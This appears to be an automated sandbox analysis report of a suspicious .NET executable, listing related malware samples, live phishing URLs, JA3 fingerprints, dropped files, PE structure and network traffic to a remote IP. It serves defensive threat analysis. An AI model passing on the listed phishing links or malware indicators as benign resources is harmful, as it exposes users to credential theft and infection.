	https://emaut-27ef.orlvrbliillroeo.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://imgern-ee14.earyllofeprir.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://yesterwebring.neocities.org	Get hash	malicious	Phisher	Browse	169.197.85.95
	https://cw91z3.fh99.fdske.com/ec/gAAAAABmFI7-U75wZdk4Jb365_DTJqKG3bSWfxdeSUjKOGzC1y6cTw11NTNId5ZX_vUEirXQMOioH9lREiens6j45wgrBwPNUg0uSDQmqtCKabvqmsO9d-jSFqKsV-M0M0FDb5u8aYCVKX5ifFJMqRSVDyLIOq4SxxILM4A2xp-o9rwoX4s-XvuDADU_TNcyVbra--hPXo71icLx1OlYaHQwLc3irmvEF5DXnSsrdixQcsYhoJOmaUwxwafMfg6diethBd0AkdPtF0e1B48pjpY2p_oC321MdbAoks8RsEV-HKtGs2YtfbsD6cP5oBf4m1oGU3Rh-RiP1bC18-RBmMJtE7QKxfyXq8wZ46KdWIP58MhnYBgqHmafN7CQoT0E_tmQRciG4oza07UOcacbqa0srkxsA5wf2DOmMdHgqp_4eFLTl4AjE7ir9dFj3ERp6KtGptj0wHPYaUffnCuAL4KV97Mv9pCAa57wfaOzAjidEwoPIlj-nDA=#resort@sbm.mc	Get hash	malicious	HTMLPhisher	Browse	162.249.168.129
	http://sellugsk.live	Get hash	malicious	Unknown	Browse	169.197.85.95
	https://dhlpaketzoll.sviluppo.host/Paket/	Get hash	malicious	Unknown	Browse	169.197.85.95
	(No subject) (2).eml	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://objectstorage.sa-saopaulo-1.oraclecloud.com/n/grnf1myuo7lg/b/bucket-20240402-0423/o/indexsmoke.html	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	169.197.85.95
CLOUDFLARENETUS	RrHuyQ4GzG.exe	Get hash	malicious	LummaC	Browse	104.21.86.106
	https://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ0ODAzLU1pY3Jvc29mdC1DUEwtUTItUE1HLUFCTS1HZXItMS1sYW5kaW5nLnBocD9lPWJvbnVjY2VsbGkuZGFyaW9AZGVtZS1ncm91cC5jb20=&r=14547470367&d=12037165&p=1&t=h&h=fb97401a549b1167a78f6002a0aef94d	Get hash	malicious	Unknown	Browse	172.67.74.40
	jNeaezBuo8.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	104.21.4.208
	74fa486WVX.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	104.21.76.57
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	Receipt_7814002.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	Essay on Resolution of Korean Forced Labor Claims.vbs	Get hash	malicious	Unknown	Browse	104.26.15.182
	VN24A02765.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ShippingOrder_ GSHS2400052.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	qk9TaBBxh8.exe	Get hash	malicious	LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.180.119

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Receipt_7814002.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	169.197.85.95
	fP4kybhBWi.exe	Get hash	malicious	Quasar	Browse	169.197.85.95
	VN24A02765.PDF.exe	Get hash	malicious	AgentTesla	Browse	169.197.85.95
	ShippingOrder_ GSHS2400052.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	169.197.85.95
	SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe	Get hash	malicious	AgentTesla	Browse	169.197.85.95
	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	169.197.85.95
	IMG_210112052.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	169.197.85.95
	https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4y	Get hash	malicious	HTMLPhisher	Browse	169.197.85.95
	https://www.canva.com/design/DAGC4eUhMw0/cKr_ImwjL8JW0nUMNMi5QA/view?utm_content=DAGC4eUhMw0&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	169.197.85.95
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	169.197.85.95
a0e9f5d64349fb13191bc781f81f42e1	RrHuyQ4GzG.exe	Get hash	malicious	LummaC	Browse	172.67.129.243
	SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe	Get hash	malicious	Unknown	Browse	172.67.129.243
	SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe	Get hash	malicious	Unknown	Browse	172.67.129.243
	FFE Order details - Cincy v41720.xlsx	Get hash	malicious	Unknown	Browse	172.67.129.243
	z47Danfe-Pedido17042024.msi	Get hash	malicious	MicroClip	Browse	172.67.129.243
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.129.243
	Gantt_Excel_Pro_Daily_Free1.xlsm	Get hash	malicious	Unknown	Browse	172.67.129.243
	s2dwlCsA95.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.129.243
	SecuriteInfo.com.Trojan.PWS.Steam.37210.2413.24955.exe	Get hash	malicious	LummaC	Browse	172.67.129.243
	avp.msi	Get hash	malicious	Unknown	Browse	172.67.129.243

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:31 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2106
Entropy (8bit):	3.453852617859877
Encrypted:	false
SSDEEP:	48:8SAdATkoGRYrnvPdAKRkdAs6IdAKRFdAKR/U:8Sjt
MD5:	7A5D58E4D426E47EB1336699E29A99E2
SHA1:	5E02B20388034165412E3E7680C9577D2300DCCF
SHA-256:	C46213E2C19001FB62BE463CBB35CF8394021B55D5DA3E9BCE631A36FFB59BB4
SHA-512:	296601CE4C2CF1AC55B81754F7197D48633F1272DEC83C5B431D19F4A78CD723C90D87280808F59037F22C2D8D4D7050C20C2EA3B3B62F867123EA2B14EC9381
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ......,....E..........q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWP`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWP`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWP`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWI`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.".-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2M1NS61GG8.exe.log

Download File

Process:	C:\Users\user\Desktop\2M1NS61GG8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1427
Entropy (8bit):	5.357044657090546
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4q4E4Tye:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzew
MD5:	E26687BC12634F920713101924296482
SHA1:	BEAA8A15E2E21A2A4989191A9D44D6C48741E9E0
SHA-256:	5FC819E297BAD76D742C1A37DD0B0825E11B58B20D793E59D194DF179623C2C0
SHA-512:	8980D032A23F4BA1E2656C2B7E213D11C23249A6A97DEE1534826F4C1E84DF81BC28B6981CBA5E2047A5AC966140B4FA16642FCF398E62B0EEFBE1152FD85277
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1299
Entropy (8bit):	5.342376182732888
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4xLE4qE4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0H6
MD5:	D62639C5676A8FA1A0C2215824B6553A
SHA1:	544B2C6E7A43CE06B68DF441CC237AB7A742B5CD
SHA-256:	761379FF547D28D053F7683499D25F7F1B5523CC7262A2DA64AF26448F7E2D76
SHA-512:	5B46D1BDB899D8FA5C7431CA7061CDD1F00BE14CD53B630FAB52E52DA20F4B2BED405F932D7C0E9D74D84129D5BB5DE9B32CC709DA3D6995423E2ED91E92ACD3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\TmpE8B6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpE8D6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.721105856537521
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	2M1NS61GG8.exe
File size:	5'382'656 bytes
MD5:	c7eea9d0d8f7bf74bd7c25990458bcf8
SHA1:	4a03f78ca6f3df3c692ad31d2bdee7cb58b86c3d
SHA256:	28794b11097d9740a1bfce3e06458bccdccc167ceb75a140b4d031d052528d10
SHA512:	f96c4065120546987623633edfbd3568207bb92c6740eded13f69809b388085d29702f32fe26069f661a671b7e43e4f6050876e7d2514f71a5ed866535dae0bc
SSDEEP:	98304:HkCjNtZ5Zo/Lq84Ti1hG9mzE1HKzf9hdspe0GZNfb9eTGf:HkEP5e/Lq84Ti1I6E1HUcSvb9eTGf
TLSH:	1E4633313BA14457C10D637074B1BBE9E7B60CCAFE4B0A2D99F6AA5C4D7029E33431A9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.\..............P...Q...........Q.. ....Q...@.. ........................R...........`................................

File Icon


Icon Hash:	676911932345f229

Static PE Info

General

Entrypoint:	0x91b0fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C8F7090 [Mon Mar 18 10:18:56 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x51b0b0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51c000	0x8b30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x526000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x519104	0x519200	85bbe9f7fc0ee66d961dbc328652b12b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x51c000	0x8b30	0x8c00	82b9d2fbfbcade1b8f8a3c594dca8b57	False	0.3021484375	data	4.670931571995219	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x526000	0xc	0x200	ed3fc25860cd30e47638030fdce5af1b	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x51c1a8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896			0.18971421823334908
RT_ICON	0x5203d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.3967842323651452
RT_ICON	0x522978	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.37382739212007504
RT_ICON	0x523a20	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.5807377049180328
RT_ICON	0x5243a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.6666666666666666
RT_GROUP_ICON	0x524810	0x4c	data			0.8421052631578947
RT_VERSION	0x52485c	0x2d4	data	English	United States	0.4613259668508287

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 13:22:01.275510073 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.275546074 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.275605917 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.287408113 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.287426949 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.558686972 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.558815956 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.562782049 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.562793016 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.563173056 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.612211943 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.660150051 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.805001974 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.805017948 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.805087090 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.805104017 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.805154085 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.819295883 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.819359064 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.833288908 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.833373070 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.851042032 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.851118088 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.931345940 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.931413889 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.935760021 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.935818911 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.953596115 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.953660011 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.971179008 CEST	443	49732	169.197.85.95	192.168.2.4
